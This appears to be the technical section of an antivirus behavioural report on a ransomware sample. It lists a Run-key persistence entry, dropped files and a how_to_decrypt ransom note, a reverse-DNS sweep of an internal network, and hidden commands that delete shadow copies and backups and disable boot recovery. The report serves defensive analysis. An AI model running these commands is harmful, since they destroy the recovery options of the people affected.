Technical Information
- [<HKCU>\software\microsoft\windows\currentversion\run] '733A49ED-09EF511D' = '"%TEMP%\svcqzi.exe" -id "733A49ED-09EF511D" -wid "vis"'
- [<HKLM>\software\Wow6432Node\microsoft\windows\currentversion\run] '2839670' = '2839670'
- <Drive name for removable media>:\archer.avi
- <Drive name for removable media>:\split.avi
- <Drive name for removable media>:\contoso_1.cer
- <Drive name for removable media>:\contoso.cer
- <Drive name for removable media>:\contosoroot.cer
- <Drive name for removable media>:\sdksampleprivdeveloper.cer
- %TEMP%\how_to_decrypt.hta
- %TEMP%\svcqzi.exe
- %TEMP%\d-1628649582.log
- D:\$recycle.bin\s-1-5-21-1960123792-2022915161-3775307078-1001\how_to_decrypt.hta
- D:\$recycle.bin\how_to_decrypt.hta
- D:\how_to_decrypt.hta
- %TEMP%\f-1628649582.log
- D:\$recycle.bin\s-1-5-21-1960123792-2022915161-3775307078-1001\desktop.ini
- <Drive name for removable media>:\archer.avi
- <Drive name for removable media>:\split.avi
- <Drive name for removable media>:\contoso_1.cer
- <Drive name for removable media>:\contoso.cer
- <Drive name for removable media>:\contosoroot.cer
- <Drive name for removable media>:\sdksampleprivdeveloper.cer
- DNS ASK 10#.##.#.10.in-addr.arpa
- DNS ASK 27.##.#.10.in-addr.arpa
- DNS ASK 28.##.#.10.in-addr.arpa
- DNS ASK 29.##.#.10.in-addr.arpa
- DNS ASK 30.##.#.10.in-addr.arpa
- DNS ASK 31.##.#.10.in-addr.arpa
- DNS ASK 32.##.#.10.in-addr.arpa
- DNS ASK 33.##.#.10.in-addr.arpa
- DNS ASK 34.##.#.10.in-addr.arpa
- DNS ASK 35.##.#.10.in-addr.arpa
- DNS ASK 36.##.#.10.in-addr.arpa
- DNS ASK 37.##.#.10.in-addr.arpa
- DNS ASK 38.##.#.10.in-addr.arpa
- DNS ASK 39.##.#.10.in-addr.arpa
- DNS ASK 40.##.#.10.in-addr.arpa
- DNS ASK 41.##.#.10.in-addr.arpa
- DNS ASK 42.##.#.10.in-addr.arpa
- DNS ASK 43.##.#.10.in-addr.arpa
- DNS ASK 44.##.#.10.in-addr.arpa
- DNS ASK 45.##.#.10.in-addr.arpa
- DNS ASK 46.##.#.10.in-addr.arpa
- DNS ASK 47.##.#.10.in-addr.arpa
- DNS ASK 49.##.#.10.in-addr.arpa
- DNS ASK 48.##.#.10.in-addr.arpa
- DNS ASK 26.##.#.10.in-addr.arpa
- DNS ASK 25.##.#.10.in-addr.arpa
- DNS ASK 3.##.#.10.in-addr.arpa
- DNS ASK 4.##.#.10.in-addr.arpa
- DNS ASK 5.##.#.10.in-addr.arpa
- DNS ASK 6.##.#.10.in-addr.arpa
- DNS ASK 7.##.#.10.in-addr.arpa
- DNS ASK 8.##.#.10.in-addr.arpa
- DNS ASK 9.##.#.10.in-addr.arpa
- DNS ASK 10.##.#.10.in-addr.arpa
- DNS ASK 11.##.#.10.in-addr.arpa
- DNS ASK 12.##.#.10.in-addr.arpa
- DNS ASK 14.##.#.10.in-addr.arpa
- DNS ASK 64.##.#.10.in-addr.arpa
- DNS ASK 15.##.#.10.in-addr.arpa
- DNS ASK 16.##.#.10.in-addr.arpa
- DNS ASK 17.##.#.10.in-addr.arpa
- DNS ASK 18.##.#.10.in-addr.arpa
- DNS ASK 19.##.#.10.in-addr.arpa
- DNS ASK 20.##.#.10.in-addr.arpa
- DNS ASK 21.##.#.10.in-addr.arpa
- DNS ASK 22.##.#.10.in-addr.arpa
- DNS ASK 23.##.#.10.in-addr.arpa
- DNS ASK 24.##.#.10.in-addr.arpa
- DNS ASK 50.##.#.10.in-addr.arpa
- DNS ASK 51.##.#.10.in-addr.arpa
- DNS ASK 52.##.#.10.in-addr.arpa
- DNS ASK 81.##.#.10.in-addr.arpa
- DNS ASK 82.##.#.10.in-addr.arpa
- DNS ASK 83.##.#.10.in-addr.arpa
- DNS ASK 84.##.#.10.in-addr.arpa
- DNS ASK 85.##.#.10.in-addr.arpa
- DNS ASK 86.##.#.10.in-addr.arpa
- DNS ASK 87.##.#.10.in-addr.arpa
- DNS ASK 88.##.#.10.in-addr.arpa
- DNS ASK 89.##.#.10.in-addr.arpa
- DNS ASK 90.##.#.10.in-addr.arpa
- DNS ASK 91.##.#.10.in-addr.arpa
- DNS ASK 92.##.#.10.in-addr.arpa
- DNS ASK 93.##.#.10.in-addr.arpa
- DNS ASK 94.##.#.10.in-addr.arpa
- DNS ASK 95.##.#.10.in-addr.arpa
- DNS ASK 96.##.#.10.in-addr.arpa
- DNS ASK 97.##.#.10.in-addr.arpa
- DNS ASK 98.##.#.10.in-addr.arpa
- DNS ASK 99.##.#.10.in-addr.arpa
- DNS ASK 0.##.#.10.in-addr.arpa
- DNS ASK 79.##.#.10.in-addr.arpa
- DNS ASK 78.##.#.10.in-addr.arpa
- DNS ASK 80.##.#.10.in-addr.arpa
- DNS ASK 77.##.#.10.in-addr.arpa
- DNS ASK 53.##.#.10.in-addr.arpa
- DNS ASK 76.##.#.10.in-addr.arpa
- DNS ASK 54.##.#.10.in-addr.arpa
- DNS ASK 55.##.#.10.in-addr.arpa
- DNS ASK 56.##.#.10.in-addr.arpa
- DNS ASK 57.##.#.10.in-addr.arpa
- DNS ASK 58.##.#.10.in-addr.arpa
- DNS ASK 59.##.#.10.in-addr.arpa
- DNS ASK 60.##.#.10.in-addr.arpa
- DNS ASK 61.##.#.10.in-addr.arpa
- DNS ASK 62.##.#.10.in-addr.arpa
- DNS ASK 13.##.#.10.in-addr.arpa
- DNS ASK 2.##.#.10.in-addr.arpa
- DNS ASK 65.##.#.10.in-addr.arpa
- DNS ASK 66.##.#.10.in-addr.arpa
- DNS ASK 67.##.#.10.in-addr.arpa
- DNS ASK 68.##.#.10.in-addr.arpa
- DNS ASK 69.##.#.10.in-addr.arpa
- DNS ASK 70.##.#.10.in-addr.arpa
- DNS ASK 71.##.#.10.in-addr.arpa
- DNS ASK 73.##.#.10.in-addr.arpa
- DNS ASK 74.##.#.10.in-addr.arpa
- DNS ASK 75.##.#.10.in-addr.arpa
- DNS ASK 63.##.#.10.in-addr.arpa
- DNS ASK 1.##.#.10.in-addr.arpa
- '%TEMP%\svcqzi.exe'
- '%WINDIR%\syswow64\cmd.exe' /c "ping 0.0.0.0&del "<Full path to file>""' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin delete shadows /all /quiet"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "wbadmin DELETE BACKUP -keepVersions:0"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "wmic SHADOWCOPY DELETE"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "bcdedit /set {default} recoveryenabled No"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "bcdedit /set {default} bootstatuspolicy ignoreallfailures"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c "ping 0.0.0.0&del "<Full path to file>""
- '%WINDIR%\syswow64\ping.exe' 0.0.0.0
- '%WINDIR%\syswow64\cmd.exe' /c "vssadmin delete shadows /all /quiet"
- '%WINDIR%\syswow64\cmd.exe' /c "wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0"
- '%WINDIR%\syswow64\cmd.exe' /c "wbadmin DELETE BACKUP -keepVersions:0"
- '%WINDIR%\syswow64\cmd.exe' /c "wmic SHADOWCOPY DELETE"
- '%WINDIR%\syswow64\cmd.exe' /c "bcdedit /set {default} recoveryenabled No"
- '%WINDIR%\syswow64\cmd.exe' /c "bcdedit /set {default} bootstatuspolicy ignoreallfailures"